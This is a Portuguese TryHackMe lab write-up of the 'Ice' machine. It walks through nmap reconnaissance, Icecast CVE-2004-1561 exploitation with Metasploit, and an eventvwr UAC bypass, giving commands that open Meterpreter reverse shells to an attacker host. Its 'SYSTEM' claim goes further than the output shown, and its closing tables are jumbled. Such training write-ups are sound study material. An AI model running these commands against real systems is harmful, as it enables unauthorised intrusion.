
Comprometimento total da máquina Ice do TryHackMe — RCE no Icecast 2.0.1 (CVE-2004-1561) via estouro de buffer, seguido de escalonamento de privilégios no Windows por meio de bypass de UAC / sequestro de COM. Inclui metodologia detalhada e remediação.
Plataforma: TryHackMe SO alvo: Windows 7 / Windows Server 2008 R2 Dificuldade: Fácil Categoria: Buffer Overflow (RCE), Escalação Local de Privilégios
Este relatório documenta a exploração completa da máquina Ice no TryHackMe, desde a reconhecimento inicial até a escalação de privilégios para SYSTEM. O alvo expõe um servidor de streaming de mídia Icecast 2.0.1 desatualizado, vulnerável a um buffer overflow remoto (CVE-2004-1561) que permite a execução arbitrária de código por meio de cabeçalhos HTTP maliciosos. O acesso inicial foi obtido como um usuário de baixo privilégio por meio de um reverse shell Meterpreter. A escalação de privilégios para NT AUTHORITY\SYSTEM foi então alcançada abusando de uma vulnerabilidade de sequestro de objeto COM do Windows (bypassuac_eventvwr), que aproveita binários com autoelevação e redirecionamento de chaves de registro em HKCU.
| Etapa | Técnica | Resultado |
|---|---|---|
| Reconhecimento | arp-scan, nmap | Host identificado + 7 portas abertas |
| Acesso Inicial | Buffer overflow no cabeçalho HTTP do Icecast (CVE-2004-1561) | Sessão Meterpreter como usuário local |
| Escalação de Privilégios | bypassuac_eventvwr (sequestro de COM/registro) | Shell SYSTEM |
Uma varredura ARP foi usada para identificar o endereço IP do alvo na rede local.
arp-scan -l

Alvo identificado em 192.168.37.138.
Uma varredura SYN completa com detecção de serviço/versão foi executada contra o alvo:
nmap -sS -sV 192.168.37.138
Resultados:
O host foi identificado como DARK-PC, uma máquina Windows. A porta 8000 executando Icecast destacou-se como a superfície de ataque mais promissora — não é um serviço Windows padrão e é conhecida por possuir CVEs históricas.
Uma busca por vulnerabilidades conhecidas do Icecast revelou a CVE-2004-1561:
Buffer overflow no Icecast 2.0.1 e versões anteriores permite que atacantes remotos executem código arbitrário por meio de uma solicitação HTTP com um grande número de cabeçalhos.
Um módulo correspondente do Metasploit foi confirmado:
search CVE-2004-1561

exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
O Icecast 2.0.1 não verifica adequadamente os limites do número de cabeçalhos HTTP que processa. Ao enviar mais cabeçalhos do que o buffer do servidor é dimensionado para suportar, o excesso de dados transborda para a memória adjacente, sobrescrevendo dados fora do buffer reservado para análise de cabeçalhos.
Especificamente, o overflow corrompe o endereço de retorno salvo (EIP) na pilha — o endereço para o qual a CPU retorna quando a função que trata a solicitação termina. Ao controlar esse endereço, um atacante pode redirecionar a execução para um shellcode fornecido pelo atacante, em vez do ponto de retorno legítimo, resultando em execução arbitrária de código no contexto do processo Icecast.
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

exploit
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)
Uma sessão Meterpreter foi estabelecida como um usuário de baixo privilégio.
Com uma sessão ativa, o sugestor integrado do Metasploit foi usado para identificar caminhos viáveis de escalação local de privilégios para o nível de correção do alvo:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Vários módulos foram sinalizados como provavelmente viáveis, incluindo bypassuac_eventvwr, que visa hosts Windows 7 / Server 2008 R2 sem correções.
Esse caminho de escalação de privilégios abusa da arquitetura COM (Component Object Model) do Windows, que permite que componentes escritos em diferentes linguagens interoperem. Objetos COM normalmente dependem de DLLs compartilhadas, e o sistema resolve qual DLL carregar para um determinado objeto COM por meio de caminhos de registro — incluindo caminhos armazenados no hive HKCU do usuário atual.
eventvwr.exe é um binário Windows com autoelevação (ele silenciosamente dispara uma solicitação de elevação de UAC sem exibir o prompt em si, devido às configurações de manifesto, em configurações padrão de UAC). Quando executado, ele consulta HKCU para resolver um objeto COM e carregar sua DLL associada.
O exploit sequestra essa consulta: ele grava uma chave de registro maliciosa no hive HKCU do usuário atual, apontando a resolução do COM para um payload controlado pelo atacante, em vez da DLL legítima do sistema. Como o eventvwr.exe se autoeleva, o payload que ele aciona — neste caso, um shell de comando — é executado com o nível de integridade ao qual o eventvwr.exe eleva, elevando a sessão de um usuário padrão para um contexto de privilégios mais altos, sem nunca exibir um prompt de UAC visível.
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...
C:\Windows\system32>
Uma segunda sessão Meterpreter foi aberta com um shell elevado, caindo diretamente em C:\Windows\system32, confirmando a escalação de privilégios.
| # | Descoberta | Severidade |
|---|
eventvwr.exe foi corrigido em versões posteriores do Windows; esse ataque não funciona contra versões modernas e totalmente atualizadas do Windows.arp-scan, nmap — reconhecimentoMetasploit Framework (msfconsole) — exploração e pós-exploraçãoMeterpreter — shell de pós-exploração| Porta | Serviço | Versão |
|---|
| 135/tcp | msrpc | Microsoft Windows RPC |
| 139/tcp | netbios-ssn | Microsoft Windows netbios-ssn |
| 445/tcp | microsoft-ds | Windows 7–10 (grupo de trabalho: WORKGROUP) |
| 5357/tcp | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| 8000/tcp | http | Icecast streaming media server |
| 49152–49157/tcp | msrpc | Microsoft Windows RPC |
| CVE / Referência |
|---|
| 1 | Buffer overflow no cabeçalho HTTP do Icecast 2.0.1 levando à execução remota de código | Crítica | CVE-2004-1561 |
| 2 | Bypass de UAC via sequestro de COM/registro (autoelevação do eventvwr.exe) | Alta | Fraqueza conhecida de design do UAC no Windows 7/Server 2008 R2 |